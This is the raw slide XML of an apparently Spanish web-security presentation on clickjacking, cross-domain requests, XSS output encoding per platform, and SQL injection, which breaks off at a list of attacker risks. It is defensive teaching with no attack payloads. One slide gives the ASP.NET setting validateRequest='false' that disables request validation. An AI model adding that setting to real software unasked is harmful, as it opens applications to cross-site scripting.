                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>A lo largo del año 2009, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-ES" sz="2400" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>sitios como </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" kern="0" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Twitter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> o </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-ES" sz="2400" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" kern="0" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Facebook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> han adolecido </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-ES" sz="2400" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>de estas vulnerabilidades.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="33557C"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Mitigar comprobando </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" kern="0" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> y </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" kern="0" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>requiriendo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" kern="0" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>validación</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>  GET y POST, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>no solo cookies</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="2400" kern="0" dirty="0">
              <a:latin typeface="+mn-lt"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="8 Imagen" descr="clickjacking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0124" y="2415509"/>
            <a:ext cx="4348582" cy="393930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Clickjacking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Para mitigar esta vulnerabilidad Microsoft propuso una solución, el uso de la cabecera HTTP X-FRAME-OPTIONS:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t>DENY : Bloquea la carga de la página en cualquier IFRAME</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t>SAMEORIGN: Bloque la carga de la página en dominios externos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t>Página para chequear </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>Clickjacking</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" u="sng" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://blogs.msdn.com/ie/archive/2009/01/27/ie8-security-part-vii-clickjacking-defenses.aspx</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="2000" u="sng" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t>Resultados por navegadores</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-ES" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="140290" name="Object 2"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1526701" y="4677552"/>
          <a:ext cx="6351615" cy="1197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2" name="Documento" r:id="rId4" imgW="5740187" imgH="1083165" progId="Word.Document.12">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Documento" r:id="rId4" imgW="5740187" imgH="108316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6701" y="4677552"/>
                        <a:ext cx="6351615" cy="1197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/>
              <a:t>ClickJacking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Domain Request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Inconveniente para los programadores: No es posible realizar peticiones AJAX a recursos que se encuentren en otros dominios.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t>Soluciones</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t>W3C: Extiendo el objeto </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>XMLHttpRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t>Microsoft: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>XDomainRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t>  en IE8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t>Seguridad:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t>Access-Control-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>Allow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>Origin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t>: Permite definir los dominios que pueden llamar a la página mediante AJAX (se permite el comodín *)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t>Access-Control-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>Allow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>Credentials</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t>: Es necesario utilizar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>XDomainRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t> con el atributo “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>withCredentials</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t>” de modo que se mantiene una sesión con cookies, pudiendo el servidor realizar validaciones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¿Qué hago como desarrollador?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ASP.NET</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>XSS habilitado por defecto en todas las páginas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Para deshabilitarlo: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>&lt;%@ Page… </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>validateRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>=“false” … %&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Microsoft Anti-Cross </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Site</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> Scripting Library 1.5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Aglutina una serie de métodos para codificar la salida: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>HtmlEncode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>HtmlAttributeEncode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>JavaScriptEncode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>UrlEncode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>VisualBasicScriptEncode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>XmlEncode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>XmlAttributeEncode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.microsoft.com/downloads/details.aspx?FamilyId=EFB9C819-53FF-4F82-BFAF-E11625130C25&amp;displaylang=en</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3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¿Qué hago como desarrollador?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Java</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Trabajando con </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Struts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> utilizar para salida mecanismos como: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>bean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> …&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Trabajando con JSLT (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>JavaServer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Pages</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> Standard </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Tag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> Library) utilizar por defecto la opción:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>escapeXML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> = “true”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>No usar nunca:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>&lt;%= … %&gt;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MITO II: Mi Sistema es el mas seguro</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0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50" y="1435100"/>
            <a:ext cx="16668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1138" y="1447800"/>
            <a:ext cx="5641975" cy="32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875" y="4062413"/>
            <a:ext cx="34194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¿Qué hago como desarrollador?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PHP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Utilizar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>htmlentities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>() o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>htmlspecialchars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>OWASP PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>AntiXSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> Library</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>SafeHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> v.1.3.7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Anti-XSS HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Parser</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://pixel-apes.com/safehtml/?page=safehtml</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2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 bwMode="auto">
          <a:xfrm>
            <a:off x="2660650" y="1506538"/>
            <a:ext cx="6262688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ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="85000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="DC0081"/>
              </a:buClr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="3600" dirty="0" err="1">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Injections</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3600" dirty="0">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3600" dirty="0" err="1">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Flaws</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="36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Vulnerabilidades</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty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8913" y="2795588"/>
            <a:ext cx="6210300" cy="2981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Introducción</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/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9088" y="1497013"/>
            <a:ext cx="714375" cy="9239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9725" y="2903538"/>
            <a:ext cx="742950" cy="1028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6713" y="4406900"/>
            <a:ext cx="733425" cy="914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34822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0988" y="2943225"/>
            <a:ext cx="2284412" cy="935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 bwMode="auto">
          <a:xfrm>
            <a:off x="2706620" y="3191897"/>
            <a:ext cx="1367670" cy="508000"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/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GET/POST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19758865">
            <a:off x="4386414" y="2493516"/>
            <a:ext cx="2324183" cy="508000"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 56789"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst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SQL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2041783">
            <a:off x="4343427" y="3685826"/>
            <a:ext cx="2466339" cy="508000"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50553"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst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XPATH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4490977" y="3066505"/>
            <a:ext cx="2164465" cy="508000"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/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LDAP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34827" name="TextBox 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7604125" y="1377950"/>
            <a:ext cx="1096963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1600"/>
              <a:t>SQL Server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1600"/>
              <a:t>MySQL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1600"/>
              <a:t>Oracle</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1600"/>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34828" name="TextBox 17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7421563" y="2838450"/>
            <a:ext cx="15652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1600"/>
              <a:t>Active Directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1600"/>
              <a:t>One Directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1600"/>
              <a:t>Novell eDirectory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1600"/>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Right Arrow 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="19758865">
            <a:off x="4388339" y="2495441"/>
            <a:ext cx="2324183" cy="508000"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 56789"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFB26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         SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-E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Injection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pic>
        <p:nvPicPr>
          <p:cNvPr id="34830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91000" y="2833688"/>
            <a:ext cx="844550" cy="10779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SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>. Explotación del ataque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s-ES" sz="2200" dirty="0"/>
              <a:t>Aplicaciones con mala comprobación de datos de entrada.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1800" dirty="0"/>
              <a:t>Datos de usuario.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s-ES" sz="1600" dirty="0"/>
              <a:t>Formularios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s-ES" sz="1400" dirty="0" err="1"/>
              <a:t>Text</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0" err="1"/>
              <a:t>Password</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0" err="1"/>
              <a:t>Textarea</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0" err="1"/>
              <a:t>List</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0" err="1"/>
              <a:t>multilist</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="14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1800" dirty="0"/>
              <a:t>Datos de llamadas a procedimientos.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s-ES" sz="1600" dirty="0"/>
              <a:t>Links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s-ES" sz="1600" dirty="0"/>
              <a:t>Funciones Scripts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s-ES" sz="1600" dirty="0" err="1"/>
              <a:t>Actions</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="16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s-ES" sz="2200" dirty="0"/>
              <a:t>Datos de usuario utilizados en consultas a base de datos.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2200" dirty="0"/>
              <a:t>Mala construcción de consultas a bases de datos.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SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>. Riesgos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Permiten al atacante:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
